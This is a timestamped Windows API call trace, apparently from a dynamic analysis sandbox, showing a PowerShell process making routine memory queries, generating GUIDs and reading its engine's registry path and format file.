[0079.871] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.871] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.872] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.872] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.872] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.872] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.872] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.872] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x1add802, Data2=0xff61, Data3=0x4181, Data4=([0]=0x9c, [1]=0xfd, [2]=0x7e, [3]=0xcc, [4]=0x86, [5]=0xce, [6]=0x3d, [7]=0xaf))) returned 0x0
[0079.872] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.873] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.873] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.873] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.873] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.873] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.873] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.874] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.874] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.874] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.874] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.874] VirtualQuery (in: lpAddress=0x10b420, lpBuffer=0x10c2e0, dwLength=0x30 | out: lpBuffer=0x10c2e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.874] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.875] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.875] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.875] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.875] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xcc06074, Data2=0xe706, Data3=0x4f57, Data4=([0]=0xb9, [1]=0x9d, [2]=0xfd, [3]=0xbd, [4]=0xcd, [5]=0x97, [6]=0x5, [7]=0x52))) returned 0x0
[0079.875] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x7d8aae28, Data2=0xb356, Data3=0x41c0, Data4=([0]=0x9e, [1]=0x5a, [2]=0xa5, [3]=0xcc, [4]=0xbe, [5]=0x98, [6]=0x37, [7]=0x29))) returned 0x0
[0079.875] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x139a182e, Data2=0xdf60, Data3=0x48dc, Data4=([0]=0xae, [1]=0x89, [2]=0xf1, [3]=0xb4, [4]=0x73, [5]=0x92, [6]=0x64, [7]=0xca))) returned 0x0
[0079.876] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x11898d04, Data2=0x1358, Data3=0x45a1, Data4=([0]=0xb1, [1]=0x47, [2]=0xeb, [3]=0x80, [4]=0xae, [5]=0x63, [6]=0xbf, [7]=0xed))) returned 0x0
[0079.876] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x76794956, Data2=0xcde, Data3=0x4db6, Data4=([0]=0x95, [1]=0x21, [2]=0x80, [3]=0x6, [4]=0xa8, [5]=0x9, [6]=0x89, [7]=0x2b))) returned 0x0
[0079.877] VirtualQuery (in: lpAddress=0x10b530, lpBuffer=0x10c3f0, dwLength=0x30 | out: lpBuffer=0x10c3f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.877] VirtualQuery (in: lpAddress=0x10b5c0, lpBuffer=0x10c480, dwLength=0x30 | out: lpBuffer=0x10c480*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.877] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xebfc2094, Data2=0xb618, Data3=0x46b2, Data4=([0]=0xaf, [1]=0x3a, [2]=0x41, [3]=0x25, [4]=0x45, [5]=0x1c, [6]=0x61, [7]=0xa6))) returned 0x0
[0079.877] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xd14c06ee, Data2=0xfbe2, Data3=0x41a4, Data4=([0]=0x84, [1]=0x40, [2]=0x27, [3]=0xed, [4]=0xd6, [5]=0xa0, [6]=0x23, [7]=0x9a))) returned 0x0
[0079.877] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe5e00304, Data2=0x44fb, Data3=0x4986, Data4=([0]=0x90, [1]=0xc4, [2]=0xdd, [3]=0x80, [4]=0x9d, [5]=0xb7, [6]=0x93, [7]=0xc0))) returned 0x0
[0079.877] SetErrorMode (uMode=0x1) returned 0x1
[0079.940] SetErrorMode (uMode=0x1) returned 0x1
[0079.940] GetFileType (hFile=0x30c) returned 0x1
[0079.944] SetErrorMode (uMode=0x1) returned 0x1
[0079.944] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
[0079.944] SetErrorMode (uMode=0x1) returned 0x1
[0079.944] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.944] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.944] CoTaskMemAlloc (cb=0x5a) returned 0x24d1a0
[0079.944] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d1a0, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.944] CoTaskMemFree (pv=0x24d1a0)
[0079.944] RegCloseKey (hKey=0x30c) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xfe5d131, Data2=0x550c, Data3=0x4166, Data4=([0]=0x8e, [1]=0xbd, [2]=0xae, [3]=0xef, [4]=0xc5, [5]=0x41, [6]=0x89, [7]=0x10))) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x47805861, Data2=0xf3f9, Data3=0x475a, Data4=([0]=0x9b, [1]=0x3d, [2]=0x9, [3]=0xe2, [4]=0xe5, [5]=0xff, [6]=0xe1, [7]=0x38))) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xab5b8e45, Data2=0xeaa4, Data3=0x4218, Data4=([0]=0xba, [1]=0xd8, [2]=0x29, [3]=0x6d, [4]=0xfa, [5]=0xa2, [6]=0xbb, [7]=0xee))) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xdeb693bd, Data2=0x3f83, Data3=0x4bcb, Data4=([0]=0xbb, [1]=0x39, [2]=0xc2, [3]=0x73, [4]=0x89, [5]=0xd3, [6]=0x45, [7]=0x7f))) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x99db9720, Data2=0x3f1, Data3=0x41fc, Data4=([0]=0xbf, [1]=0x9b, [2]=0x78, [3]=0x94, [4]=0x5f, [5]=0x60, [6]=0x43, [7]=0x14))) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x29534bbf, Data2=0x1a5e, Data3=0x4d0a, Data4=([0]=0x86, [1]=0x16, [2]=0xbd, [3]=0x33, [4]=0xcc, [5]=0x82, [6]=0xb, [7]=0xd7))) returned 0x0
[0079.947] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x60bd913e, Data2=0x22da, Data3=0x4918, Data4=([0]=0x89, [1]=0x18, [2]=0x71, [3]=0x41, [4]=0xc0, [5]=0x4e, [6]=0x4c, [7]=0xa0))) returned 0x0
[0079.947] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5f77a76d, Data2=0x3be, Data3=0x4732, Data4=([0]=0x9a, [1]=0x83, [2]=0x91, [3]=0x1f, [4]=0x90, [5]=0xee, [6]=0x8b, [7]=0xe3))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xdb7b9ef9, Data2=0xd86b, Data3=0x4acb, Data4=([0]=0x93, [1]=0xfb, [2]=0xde, [3]=0xfd, [4]=0x1c, [5]=0x31, [6]=0xd6, [7]=0x3a))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xad2abe, Data2=0x792c, Data3=0x4d31, Data4=([0]=0xba, [1]=0x1f, [2]=0xe7, [3]=0x5d, [4]=0xf5, [5]=0xf4, [6]=0x8, [7]=0x48))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xca21bde0, Data2=0x8f6d, Data3=0x4b16, Data4=([0]=0xb9, [1]=0x35, [2]=0xbf, [3]=0x29, [4]=0x23, [5]=0x4e, [6]=0x52, [7]=0x65))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x1af251b2, Data2=0x3eaf, Data3=0x4600, Data4=([0]=0x87, [1]=0x9, [2]=0x4a, [3]=0xb4, [4]=0xbc, [5]=0x87, [6]=0xb, [7]=0x1e))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x86a8f55, Data2=0xd3b2, Data3=0x4189, Data4=([0]=0xb4, [1]=0x63, [2]=0x90, [3]=0xb5, [4]=0x9d, [5]=0x20, [6]=0x42, [7]=0x33))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5229b3ac, Data2=0x466c, Data3=0x4ead, Data4=([0]=0xb9, [1]=0xb5, [2]=0xf4, [3]=0x9a, [4]=0x7f, [5]=0xb, [6]=0x7e, [7]=0x1b))) returned 0x0
[0079.948] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x724e27f7, Data2=0x81c2, Data3=0x4d75, Data4=([0]=0xa9, [1]=0x5f, [2]=0x52, [3]=0xc4, [4]=0x46, [5]=0xda, [6]=0x93, [7]=0xb8))) returned 0x0
[0079.949] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5f6003a5, Data2=0xc335, Data3=0x4037, Data4=([0]=0xb1, [1]=0xde, [2]=0xd5, [3]=0xfe, [4]=0x3e, [5]=0x97, [6]=0x8c, [7]=0xe9))) returned 0x0
[0079.949] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x8b035135, Data2=0x1411, Data3=0x47f2, Data4=([0]=0x86, [1]=0x18, [2]=0x60, [3]=0x4b, [4]=0xbc, [5]=0x61, [6]=0x45, [7]=0x55))) returned 0x0
[0079.949] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x1d5fee95, Data2=0x9682, Data3=0x473c, Data4=([0]=0xae, [1]=0xf0, [2]=0x91, [3]=0x9b, [4]=0x1a, [5]=0x12, [6]=0xa9, [7]=0x78))) returned 0x0
[0079.949] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xa6a31822, Data2=0x6267, Data3=0x4adf, Data4=([0]=0x84, [1]=0xa4, [2]=0x30, [3]=0x37, [4]=0xce, [5]=0xd4, [6]=0xce, [7]=0x31))) returned 0x0
[0079.949] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.949] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.949] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x484bf05, Data2=0x4703, Data3=0x45ef, Data4=([0]=0xb8, [1]=0x16, [2]=0x57, [3]=0x90, [4]=0xa8, [5]=0xb8, [6]=0xce, [7]=0xaa))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x50da8bd8, Data2=0xcbc, Data3=0x45fd, Data4=([0]=0xaf, [1]=0xa6, [2]=0xcb, [3]=0x6c, [4]=0x5d, [5]=0xe9, [6]=0x7, [7]=0x76))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5763dc43, Data2=0xb426, Data3=0x44e6, Data4=([0]=0x80, [1]=0x20, [2]=0x9f, [3]=0x2b, [4]=0x78, [5]=0xe8, [6]=0xb7, [7]=0x13))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x88f79db6, Data2=0x35f9, Data3=0x4ab5, Data4=([0]=0xb5, [1]=0x7f, [2]=0x53, [3]=0x94, [4]=0xd, [5]=0x9c, [6]=0x2c, [7]=0xa4))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x3edcb91, Data2=0x8cce, Data3=0x450e, Data4=([0]=0xaf, [1]=0x52, [2]=0xcd, [3]=0x83, [4]=0x65, [5]=0xb1, [6]=0x9f, [7]=0x10))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x34705d1e, Data2=0xb175, Data3=0x402a, Data4=([0]=0xba, [1]=0xdc, [2]=0xe0, [3]=0x2b, [4]=0xa4, [5]=0xa2, [6]=0x50, [7]=0x10))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xc9a6818f, Data2=0x7169, Data3=0x42bd, Data4=([0]=0xaf, [1]=0x2c, [2]=0x5, [3]=0x4a, [4]=0xe, [5]=0xf2, [6]=0xa, [7]=0xee))) returned 0x0
[0079.950] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x8b45193d, Data2=0x3ba6, Data3=0x4aaf, Data4=([0]=0x8e, [1]=0x9, [2]=0xf4, [3]=0xb5, [4]=0x8b, [5]=0x4c, [6]=0x95, [7]=0xcf))) returned 0x0
[0079.951] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x2161282f, Data2=0xc180, Data3=0x4497, Data4=([0]=0x88, [1]=0x64, [2]=0xa7, [3]=0xdc, [4]=0x29, [5]=0xa, [6]=0xd4, [7]=0xad))) returned 0x0
[0079.951] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe9305058, Data2=0x14c7, Data3=0x4102, Data4=([0]=0xb4, [1]=0x47, [2]=0x16, [3]=0x36, [4]=0x47, [5]=0x57, [6]=0x2d, [7]=0x1))) returned 0x0
[0079.951] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe95c844b, Data2=0xbc9d, Data3=0x4ed0, Data4=([0]=0x98, [1]=0x6, [2]=0xd4, [3]=0x5a, [4]=0xea, [5]=0x45, [6]=0xd3, [7]=0x22))) returned 0x0
[0079.951] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x27d47f47, Data2=0xcfc0, Data3=0x49dd, Data4=([0]=0xb9, [1]=0x82, [2]=0xb5, [3]=0x40, [4]=0x18, [5]=0x99, [6]=0x93, [7]=0x68))) returned 0x0
[0079.951] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xf8bc1af, Data2=0xf5a7, Data3=0x4175, Data4=([0]=0x8e, [1]=0x7f, [2]=0x17, [3]=0x87, [4]=0x8e, [5]=0xbe, [6]=0xff, [7]=0x52))) returned 0x0
[0079.951] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.951] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xfb439619, Data2=0xdc77, Data3=0x419e, Data4=([0]=0x84, [1]=0x8, [2]=0x44, [3]=0xb7, [4]=0x8e, [5]=0x80, [6]=0x1c, [7]=0x1))) returned 0x0
[0079.951] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.952] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.953] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x8a856996, Data2=0x6dcb, Data3=0x4ec5, Data4=([0]=0xb5, [1]=0xee, [2]=0xa3, [3]=0x86, [4]=0x31, [5]=0x1e, [6]=0x17, [7]=0x4b))) returned 0x0
[0079.954] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.954] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xf58af68a, Data2=0xef02, Data3=0x4c8c, Data4=([0]=0x95, [1]=0xe3, [2]=0xb8, [3]=0xef, [4]=0xc4, [5]=0x9e, [6]=0x26, [7]=0x28))) returned 0x0
[0079.954] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xb8877700, Data2=0x9099, Data3=0x4ade, Data4=([0]=0xa9, [1]=0x82, [2]=0x43, [3]=0x82, [4]=0xae, [5]=0xd2, [6]=0xc6, [7]=0xac))) returned 0x0
[0079.954] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xd0f50a6c, Data2=0xbf29, Data3=0x4602, Data4=([0]=0x8f, [1]=0xcd, [2]=0xe, [3]=0xcc, [4]=0xea, [5]=0x17, [6]=0xed, [7]=0x3a))) returned 0x0
[0079.954] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x2b780fa9, Data2=0x5214, Data3=0x4f74, Data4=([0]=0xb4, [1]=0x70, [2]=0xf8, [3]=0x85, [4]=0xfd, [5]=0x44, [6]=0xdd, [7]=0x6e))) returned 0x0
[0079.954] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x1218a394, Data2=0x7da3, Data3=0x44c1, Data4=([0]=0x90, [1]=0xf7, [2]=0x80, [3]=0xff, [4]=0xbd, [5]=0x88, [6]=0x8, [7]=0xe3))) returned 0x0
[0079.954] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x44d049e3, Data2=0xa28b, Data3=0x45ec, Data4=([0]=0xa8, [1]=0x27, [2]=0x46, [3]=0x60, [4]=0x56, [5]=0x4c, [6]=0x9d, [7]=0x1e))) returned 0x0
[0079.955] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x819fa484, Data2=0x1616, Data3=0x420c, Data4=([0]=0xae, [1]=0xc9, [2]=0x30, [3]=0xee, [4]=0xd9, [5]=0x5d, [6]=0xd8, [7]=0x52))) returned 0x0
[0079.955] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.955] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xd1b902bd, Data2=0xfbcd, Data3=0x47af, Data4=([0]=0xba, [1]=0x1e, [2]=0x60, [3]=0xa1, [4]=0xe5, [5]=0xe4, [6]=0xbe, [7]=0xda))) returned 0x0
[0079.955] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x1787a163, Data2=0xb71e, Data3=0x429d, Data4=([0]=0xb0, [1]=0x50, [2]=0xe7, [3]=0x1f, [4]=0x63, [5]=0xc6, [6]=0x20, [7]=0xe2))) returned 0x0
